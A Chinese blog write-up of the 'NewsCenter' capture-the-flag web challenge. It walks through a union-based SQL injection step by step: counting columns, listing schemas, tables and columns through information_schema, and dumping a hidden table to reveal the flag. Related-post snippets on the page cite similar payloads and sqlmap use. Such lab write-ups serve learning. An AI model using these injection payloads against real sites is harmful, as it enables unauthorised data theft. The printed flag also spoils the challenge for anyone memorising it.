攻防世界wp-newscenter

最新推荐文章于 2024-05-18 20:54:16 发布

大写R

最新推荐文章于 2024-05-18 20:54:16 发布

阅读量270

点赞数

分类专栏： ctf-web

本文链接：https://blog.csdn.net/weixin_43916608/article/details/96766309

版权

ctf-web 专栏收录该内容

0 篇文章 0 订阅

订阅专栏

根据搜索条件，考虑题目为sql注入

1. 输入语句’ and 0 union select 1,2,3 from information_schema.tables#，查看数据库返回列数
在这里插入图片描述查询结果说明，数据库返回的列数为3

2.查询数据库名称
’ and 0 union select 1,2,table_schema from information_schema.tables#，在这里插入图片描述查询结果可知，数据库名称为 news

3. 查询news数据库中的表：
’ and 0 union select 1,2,table_name from information_schema.tables where table_schema=‘news’#
在这里插入图片描述
发现secret_table

4.查询表中列名：
’ and 0 union select 1,2,column_name from information_schema.columns where table_schema=‘news’ and table_name=‘secret_table’#
在这里插入图片描述
发现关键字fl4g

5.查询fl4g
’ and 0 union select 1,2,fl4g from secret_table#
在这里插入图片描述
得到结果：QCTF{sq1_inJec7ion_ezzz}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

大写R

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

攻防世界-NewsCenter题

weixin_46784800的博客

11-12

1542

攻防世界-NewsCenter题首先，进入靶场网站，发现是一个News界面，并且界面存在一个搜索入口，此时的第一感觉就是，这道题应该是一道sql注入的题目（后来发现确实是这样）在搜索框输入一系列数字或字母进行搜索，可搜索出来一些News：打开HackBar，在POST请求值处的字符串末尾输入单引号，尝试是否能发生单引号闭合：发现请求的返回值为500，则说明该请求在服务器的数据库中发生了单引号闭合，导致数据库查询失败，这时已经可以实锤本题为数据库注入的题目了。首先，通过order语句，判断查询

【攻防世界】八 --- NewsCenter

qq_43168364的博客

12-23

399

题目 — NewsCenter 一、writeup 主页一个search输入框，我们来测试sql注入漏洞输入单引号，回显 500 ，大概率是一个字符型注入点字段数：3 显示位：2，3 库名：news，用户名：user@10.42.101.146 表名：news, secret_table secret_table表字段名：id，fl4g 读数据，的flag 二、知识点 sql注入 ......

参与评论您还未登录，请先登录后发表或查看评论

攻防世界-web-newscenter

wuh2333的博客

05-30

1104

攻防世界，sql注入

攻防世界NewsCenter

qq_45955869的博客

05-19

724

提示：攻防世界新手模式难度2NewsCenter提示：以下是本篇文章正文内容，下面案例可供参考比较基础，比较简单。

攻防世界—NewsCenter

weixin_51030879的博客

07-23

1266

攻防世界—NewsCenter

攻防世界-NewsCenter

weixin_39579781的博客

05-06

1365

题目打开是有个输入框可以用来输入搜索信息，初步判断是个sql注入的题目。接下来判断能否进行sql注入：输入 hi，有搜索结果，如下图:输入hi’,无结果，如下图：初步判定是hi‘后面还有单引号，导致重复输入导致的，（单引号与服务端代码中的’形成闭合，将我们输入的字符串hello包裹，服务端代码后面多出来一个‘导致语法错误，而加入#将后面的’注释掉之后不会报错，可确定为字符型SQL注入。

攻防世界之NewsCenter

金帛的博客

04-09

2603

攻防世界WP

【攻防世界】七、NewsCenter

Hi~ 土拨鼠

09-13

475

步骤打开所给场景：发现一个输入框，试一下有没有sql注入，使用burp进行抓包（不知道什么原因使用hackbar提交数据页面没变化，卡了好久）：发现单引号'会出现错误，继续进行注入：1' or 1=1 # 发现页面正常，尝试一下联合查询：order by 3/4 判断字段数为3，继续注入： payload：1' union select 1,2,3 # 发现有回显，联合查询可用！接下来就是按照库表列的顺序依次进行查询： payload：1' union select 1,database.

攻防世界 newscenter

09-08

攻防世界的NewsCenter是一个基于React构建的前端应用程序，它提供了实时版本的背景和概述，展示了当前主流媒体如何报道当下的主题。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来...

攻防世界 WEB NewsCenter

ChaoYue_miku的博客

01-08

271

攻防世界 WEB NewsCenter NewsCenter：　　题目只有一个搜索框，下面显示搜索结果，最先考虑的就是sql注入，先简单构造' or '1=1，果然返回了所有新闻（7条）查看网页源码，发现这里是post方式，可以考虑使用sqlmap。　　但是如此形式的sql漏洞应该还有别的方法，毕竟这一看就没有任何过滤验证，也没有提前预编译，是最基础的sql漏洞了，在这里尝试手工构造语句，看看能不能获得什么信息。　　通常的方法就是单引号、1、2等尝试，然...

攻防世界---web---NewsCenter

最新发布

2201_75556700的博客

05-18

501

5、查询列数，查3列的时候，没有报错，再查4列的时候，报错了，所以有三列。6、使用联合查询查数据库名，数据库名为news。4、接着判断注入类型，说明存在字符型注入。8、查secret_table中的字段名。2、打开链接，类似于一个搜索新闻的界面。3、因为有文本框，所以尝试注入。试着搜索第一条新闻hello。9、查fl4g字段中的值。

攻防世界----NewsCenter（字符型SQL注入，union联合查询）

m0_70182904的博客

05-22

2007

在使用union之前需要明确：union前面查询语句查询的元素与后面查询语句查询的元素要数量上要一样，这一点可以使用order by实现（原理：order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数，但是不能多于查询的属性数）搜索框输入hello，出现与之相关的新闻内容，输入hello'之后发现网页报错，提示我们可能存在字符型SQL注入，再次输入单引号 '，发现网页再次报错，输入hello'#没有报错提示。得到表名news、secret_table。

攻防世界---NewsCenter

weixin_43803070的博客

07-15

501

废话不多说，直接上思路。 ** 手工注入： ** 1' //报错，判断字段： 1' order by 3# //最终我们得到是三个字段，在这里们用--+代替#，竟然报错。回显字段： -1' union select 1,2,3# 爆出数据库(两种方法)： -1' union select 1,2,database()# -1' union select 1,2,group_conc...

攻防世界 web进阶练习 NewsCenter

weixin_30762087的博客

06-22

312

攻防世界 web进阶练习 NewsCenter 题目是NewsCenter，没有提示信息。打开题目，有一处搜索框，搜索新闻。考虑xss或sql注入，随便输入一个abc，没有任何搜索结果，页面也没有什么变化，考虑SQL注入。随便输入234234234，用burp抓包，发现是post方式，直接用sqlmap爆破。将http头保存为1.txt，试试用sqlmap爆数据库查看news数...

攻防世界XCTF：NewsCenter

末初的CSDN博客

03-06

419

这道题是一个非常简单的sql注入 ’ and 1=1#回显正常，’ and 1=2#回显不正常。即可判断存在sql注入。接着查看，这张表有几个字段，'order by 3#正常，'order by 4#报错，判断存在3个字段。联合查询，发现2，3这两个字段存在回显。查询版本和当前连接的数据库 查询当前用户和所有数据库 查表名查字段获取字段内容 ...

攻防世界 web进阶区 NewsCenter

m0_51395584的博客

06-17

869

攻防世界 web进阶区 NewsCenter 简单的SQL联合查询注入